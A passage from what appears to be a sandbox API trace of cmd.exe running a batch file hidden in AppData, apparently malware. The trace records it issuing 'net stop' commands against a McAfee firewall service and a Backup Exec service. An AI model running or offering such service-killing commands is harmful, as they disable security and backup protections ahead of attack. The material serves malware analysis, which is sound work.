0xffffffff [0197.788] GetLastError () returned 0x2 [0197.789] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0197.789] GetLastError () returned 0x2 [0197.789] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.790] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0197.790] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0197.790] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0197.790] GetLastError () returned 0x2 [0197.791] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0197.791] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0197.791] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0197.792] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0197.792] SetErrorMode (uMode=0x0) returned 0x1 [0197.792] GetProcessHeap () returned 0x3e0000 [0197.792] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0197.792] GetProcessHeap () returned 0x3e0000 [0197.792] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0197.793] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0197.793] GetProcessHeap () returned 0x3e0000 [0197.793] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0197.793] GetProcessHeap () returned 0x3e0000 [0197.793] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0197.793] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.793] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0197.794] GetLastError () returned 0x2 [0197.794] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0197.794] GetLastError () returned 0x2 [0197.794] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.795] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0197.795] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0197.795] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0197.796] GetLastError () returned 0x2 [0197.796] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0197.796] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0197.796] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0197.796] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0197.797] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0197.797] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0197.797] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0197.797] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop mfefire /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop mfefire /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop mfefire /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0xa1c, dwThreadId=0xa28)) returned 1 [0197.801] CloseHandle (hObject=0x78) returned 1 [0197.801] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0197.801] GetProcessHeap () returned 0x3e0000 [0197.801] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0197.801] GetEnvironmentStringsW () returned 0x3f8408* [0197.801] GetProcessHeap () returned 0x3e0000 [0197.801] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0197.801] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0197.801] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0197.938] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0197.938] CloseHandle (hObject=0x74) returned 1 [0197.938] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0197.938] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0197.938] GetProcessHeap () returned 0x3e0000 [0197.938] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0197.938] GetEnvironmentStringsW () returned 0x3f8408* [0197.938] GetProcessHeap () returned 0x3e0000 [0197.938] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0197.938] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0197.938] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0197.939] GetProcessHeap () returned 0x3e0000 [0197.939] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0197.939] GetEnvironmentStringsW () returned 0x3f8408* [0197.939] GetProcessHeap () returned 0x3e0000 [0197.939] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0197.939] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0197.939] GetProcessHeap () returned 0x3e0000 [0197.939] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0197.939] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0197.939] _get_osfhandle (_FileHandle=1) returned 0x264 [0197.939] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0197.939] _get_osfhandle (_FileHandle=1) returned 0x264 [0197.939] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0197.939] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0197.939] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0197.939] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0197.939] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0197.940] SetConsoleInputExeNameW () returned 0x1 [0197.940] GetConsoleOutputCP () returned 0x1b5 [0197.940] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0197.940] SetThreadUILanguage (LangId=0x0) returned 0x409 [0197.940] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0197.940] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0197.940] _get_osfhandle (_FileHandle=3) returned 0x74 [0197.940] SetFilePointer (in: hFile=0x74, lDistanceToMove=2621, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa3d [0197.940] GetProcessHeap () returned 0x3e0000 [0197.940] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0197.940] GetProcessHeap () returned 0x3e0000 [0197.940] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0197.940] GetProcessHeap () returned 0x3e0000 [0197.940] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0197.940] GetProcessHeap () returned 0x3e0000 [0197.941] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0197.941] GetProcessHeap () returned 0x3e0000 [0197.941] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0197.941] GetProcessHeap () returned 0x3e0000 [0197.941] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0197.941] GetProcessHeap () returned 0x3e0000 [0197.941] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0197.941] GetProcessHeap () returned 0x3e0000 [0197.941] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0197.941] GetProcessHeap () returned 0x3e0000 [0197.941] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0197.941] GetProcessHeap () returned 0x3e0000 [0197.941] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0197.941] GetProcessHeap () returned 0x3e0000 [0197.941] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0197.941] GetProcessHeap () returned 0x3e0000 [0197.941] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0197.941] GetProcessHeap () returned 0x3e0000 [0197.941] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0197.941] _get_osfhandle (_FileHandle=3) returned 0x74 [0197.941] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa3d [0197.941] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xe84, lpOverlapped=0x0) returned 1 [0197.941] SetFilePointer (in: hFile=0x74, lDistanceToMove=2655, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa5f [0197.941] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=34, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop BackupExecRPCService /y\r\nce /y\r\n\r\n\r\nÇ¥ /y\r\nlures\r\nnded\r\n") returned 34 [0197.942] _get_osfhandle (_FileHandle=3) returned 0x74 [0197.942] GetFileType (hFile=0x74) returned 0x1 [0197.942] _get_osfhandle (_FileHandle=3) returned 0x74 [0197.942] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa5f [0197.942] GetProcessHeap () returned 0x3e0000 [0197.942] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0197.942] GetProcessHeap () returned 0x3e0000 [0197.942] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0197.945] _tell (_FileHandle=3) returned 2655 [0197.945] _close (_FileHandle=3) returned 0 [0197.945] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0197.945] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0197.946] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0197.946] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0197.946] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0197.946] _wcsicmp (_String1="net", _String2="CD") returned 11 [0197.946] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0197.946] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0197.946] _wcsicmp (_String1="net", _String2="REN") returned -4 [0197.946] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0197.946] _wcsicmp (_String1="net", _String2="SET") returned -5 [0197.946] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0197.946] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0197.946] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0197.946] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0197.946] _wcsicmp (_String1="net", _String2="MD") returned 1 [0197.946] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0197.946] _wcsicmp (_String1="net", _String2="RD") returned -4 [0197.946] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0197.946] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0197.946] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0197.946] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0197.946] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0197.946] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0197.946] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0197.946] _wcsicmp (_String1="net", _String2="VER") returned -8 [0197.946] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0197.946] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0197.946] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0197.946] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0197.946] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0197.946] _wcsicmp (_String1="net", _String2="START") returned -5 [0197.946] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0197.946] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0197.946] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0197.946] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0197.946] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0197.946] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0197.946] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0197.946] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0197.947] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0197.947] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0197.947] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0197.947] SetErrorMode (uMode=0x0) returned 0x1 [0197.947] GetProcessHeap () returned 0x3e0000 [0197.947] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0197.947] GetProcessHeap () returned 0x3e0000 [0197.947] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0197.948] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0197.948] GetProcessHeap () returned 0x3e0000 [0197.948] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0197.948] GetProcessHeap () returned 0x3e0000 [0197.948] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0197.948] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.949] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0197.949] GetLastError () returned 0x2 [0197.949] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0197.949] GetLastError () returned 0x2 [0197.950] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.950] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0197.950] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0197.950] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0197.951] GetLastError () returned 0x2 [0197.951] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0197.951] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0197.952] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0197.953] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0197.953] SetErrorMode (uMode=0x0) returned 0x1 [0197.953] GetProcessHeap () returned 0x3e0000 [0197.953] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0197.953] GetProcessHeap () returned 0x3e0000 [0197.953] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0197.953] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0197.953] GetProcessHeap () returned 0x3e0000 [0197.953] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0197.953] GetProcessHeap () returned 0x3e0000 [0197.953] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0197.953] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.954] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0197.954] GetLastError () returned 0x2 [0197.954] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0197.954] GetLastError () returned 0x2 [0197.955] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.955] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0197.955] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0197.956] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0197.956] GetLastError () returned 0x2 [0197.956] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0197.956] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0197.957] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0197.957] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0197.957] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0197.957] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0197.957] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0197.957] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop BackupExecRPCService /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop BackupExecRPCService /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop BackupExecRPCService /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x9f8, dwThreadId=0xa04)) returned 1 [0197.961] CloseHandle (hObject=0x74) returned 1 [0197.961] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0197.961] GetProcessHeap () returned 0x3e0000 [0197.961] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0197.961] GetEnvironmentStringsW () returned 0x3f8408* [0197.961] GetProcessHeap () returned 0x3e0000 [0197.961] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0197.961] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0197.961] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0198.092] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0198.092] CloseHandle (hObject=0x78) returned 1 [0198.092] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0198.092] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0198.092] GetProcessHeap () returned 0x3e0000 [0198.092] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0198.092] GetEnvironmentStringsW () returned 0x3f8408* [0198.092] GetProcessHeap () returned 0x3e0000 [0198.092] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0198.093] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0198.093] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0198.093] GetProcessHeap () returned 0x3e0000 [0198.093] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0198.093] GetEnvironmentStringsW () returned 0x3f8408* [0198.093] GetProcessHeap () returned 0x3e0000 [0198.093] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0198.093] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0198.093] GetProcessHeap () returned 0x3e0000 [0198.093] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0198.093] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0198.093] _get_osfhandle (_FileHandle=1) returned 0x264 [0198.093] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0198.093] _get_osfhandle (_FileHandle=1) returned 0x264 [0198.093] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0198.093] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0198.093] 